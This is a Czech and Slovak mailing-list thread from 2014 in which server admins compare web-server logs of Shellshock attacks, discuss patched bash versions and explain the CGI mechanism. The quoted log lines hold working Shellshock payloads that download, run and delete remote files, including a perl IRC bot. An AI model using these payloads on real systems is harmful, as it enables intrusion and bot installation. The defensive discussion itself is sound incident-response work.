Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu, podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj Petre, diky.
Nasel jsou zatim pouze toto :)
/var/log/nginx/access.log:54.251.83.67 - - [29/Sep/2014:07:26:24 +0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" /var/log/nginx/access.log-20140925.gz:209.126.230.72 - - [24/Sep/2014:23:47:52 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping - -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/nginx/access.log-20140926.gz:209.126.230.72 - - [25/Sep/2014:03:52:42 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping - -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/nginx/access.log-20140926.gz:89.207.135.125 - - [25/Sep/2014:14:38:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 162 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" /var/log/nginx/access.log-20140926.gz:198.20.69.74 - - [26/Sep/2014:01:47:24 +0200] "GET / HTTP/1.1" 200 612 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu, podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Hele,
z jineho stroje:
/var/log/nginx/access.log-20140929.gz:70.42.149.67 - - [28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu, podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
29. 9. 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
- 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
_______________________________________________
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje, že není žádná aktualizace. Smells fishy.
29. 9. 2014 v 10:24, Jiří Medvěd admin@jirimedved.cz:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
- 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ =OESw -----END PGP SIGNATURE----- _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Mam/mame SL 6.5 ...
Dne 29.9.2014 v 10:33 Jan Sedlák napsal(a):
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje, že není žádná aktualizace. Smells fishy.
- 2014 v 10:24, Jiří Medvěd admin@jirimedved.cz:
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
- 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v > 09:57 Jiří Medvěd napsal(a): >> Hele, >> >> z jineho stroje: > Ano, to jsem našel taky. Zjevně se tam někdo snaží > tlačit rootkit: > > http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>
_______________________________________________
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
No ja tiez, ale latest z repa je isto fixnuta verzia ....
$ lsb_release -d Description: Scientific Linux release 6.5 (Carbon) $ rpm -q bash bash-4.1.2-15.el6_5.2.x86_64
/M
2014-09-29 10:35 GMT+02:00 Jiří Medvěd admin@jirimedved.cz:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Mam/mame SL 6.5 ...
Dne 29.9.2014 v 10:33 Jan Sedlák napsal(a):
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje, že není žádná aktualizace. Smells fishy.
- 2014 v 10:24, Jiří Medvěd admin@jirimedved.cz:
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
- 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
> On 29 Sep 2014, at 10:08, Jan B. Kolář > janbivoj.kolar@zazen-nudu.cz wrote: > > Ahoj, > > možná hloupá otázka - dá se nějak z logu zjistit, zda > ten průnik byl úspěšný či nikoliv? > > Honza > >> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v >> 09:57 Jiří Medvěd napsal(a): >>> Hele, >>> >>> z jineho stroje: >> Ano, to jsem našel taky. Zjevně se tam někdo snaží >> tlačit rootkit: >> >> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/ > >
>>
> Community-list mailing list > Community-list@lists.vpsfree.cz > http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iF4EAREIAAYFAlQpGegACgkQ5JdzTS3AJTYGSgEAgOOP/ZsN8LOOEvHkFgSVoBHt IgJBnECbS0EvjznyoyMA/0q9HKfMVoUC0G/IEEr3nQUPs9gksd/Myd+27F+0QgXX =XszX -----END PGP SIGNATURE----- _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Zdar,
2014-09-29 10:33 GMT+02:00 Jan Sedlák boloomka@gmail.com:
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje, že není žádná aktualizace. Smells fishy.
mas SL6.5? daj "yum repolist", znie to ze frcis na niecom starsom.
/M
- 2014 v 10:24, Jiří Medvěd admin@jirimedved.cz:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
- 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a): > Hele, > > z jineho stroje: Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ =OESw -----END PGP SIGNATURE----- _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Máš pravdu, 6.3.
Honza
----- Původní zpráva ----- Od:"Miroslav Vadkerti" miroslav.vadkerti@gmail.com Odesláno:29. 9. 2014 10:36 Komu:"vpsFree.cz Community list" community-list@lists.vpsfree.cz Předmět:Re: [vpsFree.cz: community-list] Útoky na bash běží
Zdar,
2014-09-29 10:33 GMT+02:00 Jan Sedlák boloomka@gmail.com:
Hm, nainstalovaná verze je 4.1.2-9 a yum mi ukazuje, že není žádná aktualizace. Smells fishy.
mas SL6.5? daj "yum repolist", znie to ze frcis na niecom starsom.
/M
- 2014 v 10:24, Jiří Medvěd admin@jirimedved.cz:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj, ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).
Medved
Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):
Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá fixnutou verzi v repozitářích, že ne? A co s tím?
Honza
- 2014 v 10:10, Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a): > Hele, > > z jineho stroje: Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iF4EAREIAAYFAlQpF1cACgkQ5JdzTS3AJTZH0wEAmEzH0t1Jx5h87KZcT0yBaHHE aQtIdd8g0R0gkox18PwA+wdnJa6PU5UZAejwO+73++VCzwBUwHMe9OMAlIOlkTMZ =OESw -----END PGP SIGNATURE----- _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
a pokud mám podle logu apt, že byl bash verze 4.2+dfsg-0.1+deb7u1 instalován 2014-09-24 16:38:33, ale v logu Apache mám záznam s HTTP kódem 200 ze dne 2014-09-27 00:33:55, tak to mám chápat jak?
/var/www/0ops/log/access.log:70.42.149.68 - - [27/Sep/2014:00:33:55 +0200] "GET / HTTP/1.0" 200 643 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""
...tady hlavně nepředpokládám, že webserver handloval request na "/" spuštěním shellu. A výraz v posledním fieldu je podle mě User-Agent, takže bych z toho nanejvýš (pokud vůbec) soudil, že request přišel z hacknutého stroje.
Taky mám v logu něco podobného, na neupgradnutém stroji, a dokud šlo jen o requesty na "/" a ne na existující, natož spustitelné test.sh apod. (takové nemám, nejsem blázen), chci doufat, že můžu být klidný. Jinak by podle mě šlo především o díru ve webserveru, pokud by cokoliv založené na stringu, který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě už také věděli, v této vzrušené době...
E.
Dne 29.9.2014 v 10:54 Egon Eckert napsal(a):
Jinak by podle mě šlo především o díru ve webserveru, pokud by cokoliv založené na stringu, který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě už také věděli, v této vzrušené době...
Ne, tohle je běžné chování CGI. Server musí nějak předat informace skriptu a nemá moc možností, musí použít proměnné prostředí, aby předal cestu, user-agenta a podobně. No a tady dojde k chybě, protože pokud je použit bash, tak ten proměnné automaticky prožene evalem a pokud je v ních funkce, tak se nadefinuje a průšvih je na světě. Web server je v tom nevinně.
Jinak by podle mě šlo především o díru ve webserveru, pokud by cokoliv založené na stringu, který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě už také věděli, v této vzrušené době...
Ne, tohle je běžné chování CGI. Server musí nějak předat informace skriptu a nemá moc možností, musí použít proměnné prostředí, aby předal cestu, user-agenta a podobně. No a tady dojde k chybě, protože pokud je použit bash, tak ten proměnné automaticky prožene evalem a pokud je v ních funkce, tak se nadefinuje a průšvih je na světě. Web server je v tom nevinně.
Tomu rozumím. On ten můj druhý odstavec (viz výše) sám o sobě skutečně není pravdivý a zasluhuje rozcupovat přesně tak, jak jsi to provedl :).
Šlo mi o to, že by mělo být lhostejné co za hrůzy User-Agent obsahuje, dokud CGI skript není spuštěn, protože s ním webserver zavolá nanejvýš tak setenv() nebo něco podobného.
A pokud šel request na "/", nebude (s běžnou konfigurací) co spustit a tak nic spuštěno nebude. To byla moje "hlavní" hypotéza, proč by nás taková řádka v logu měla nechat v klidu. Hlavně tohle bych rád, kdyby někdo veřejně podpořil :).
E.
A pokud šel request na "/", nebude (s běžnou konfigurací) co spustit a tak nic spuštěno nebude. To byla moje "hlavní" hypotéza, proč by nás taková řádka v logu měla nechat v klidu. Hlavně tohle bych rád, kdyby někdo veřejně podpořil :).
Běžná konfigurace je - u webů psaných v PHP - že "/" spouští index.php. Těch bude IMO většina
On Mon, 29 Sep 2014 11:42:07 +0200 Jirka Bourek trekker.dk@abclinuxu.cz wrote:
A pokud šel request na "/", nebude (s běžnou konfigurací) co spustit a tak nic spuštěno nebude. To byla moje "hlavní" hypotéza, proč by nás taková řádka v logu měla nechat v klidu. Hlavně tohle bych rád, kdyby někdo veřejně podpořil :).
Běžná konfigurace je - u webů psaných v PHP - že "/" spouští index.php. Těch bude IMO většina
Jo, ale jaká je pravděpodobnost, že právě tato exponovaná úvodní stránka spouští externí proces? Vždyť by ten server musel lehnout při sebemenší zátěži...
Petr T
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {' /var/log/nginx/* /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan ( http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" /var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" /var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos mimik@mimik.sk:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl
úspěšný či nikoliv?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Tak jsem to zkoumal a toto je celkem bezpecne, je to zda se pouze test, zda-li je ten bash zranitelnej, ale ve skutecnosti to nic nedela.
74.201.85.69/ec.z -> je pouze uvitaci stranka nginxu.
Upgraduj hlavne ten bash :)
Medved
Dne 29.9.2014 v 10:23 René Klačan napsal(a):
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {' /var/log/nginx/* /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod http://74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod http://74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod http://74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
+0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" /var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" /var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut len podozrive procesy? a pohladat nejake stopy po tom, ci sa nezapinaju po restarte?
2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik@mimik.sk mailto:mimik@mimik.sk>:
jedine si zistit ci mas dobru verziu bashu.
On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar@zazen-nudu.cz mailto:janbivoj.kolar@zazen-nudu.cz> wrote:
Ahoj,
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik
byl úspěšný či nikoliv?
Honza
On 29.9.2014 10 tel:29.9.2014%2010:02, Petr Krcmar wrote:
Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
Hele,
z jineho stroje:
Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit rootkit:
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz
mailto:Community-list@lists.vpsfree.cz
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz mailto:Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
On 09/29/2014 10:33 AM, Jiří Medvěd wrote:
Tak jsem to zkoumal a toto je celkem bezpecne, je to zda se pouze test, zda-li je ten bash zranitelnej, ale ve skutecnosti to nic nedela.
74.201.85.69/ec.z -> je pouze uvitaci stranka nginxu.
ted jo. Ale pred par dny to byl nejaky perlovsky irc bot.
Upgraduj hlavne ten bash :)
Medved
Dne 29.9.2014 v 10:23 René Klačan napsal(a):
Ja mam v logoch nasledovne
root@yuna /home/rene # grep '() {' /var/log/nginx/* /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod http://74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod http://74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22" /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible fraud attempt from "74.201.85.69" claiming to be* *MailScanner warning: numerical links are often malicious:* 74.201.85.69/ec.z;chmod http://74.201.85.69/ec.z;chmod +x 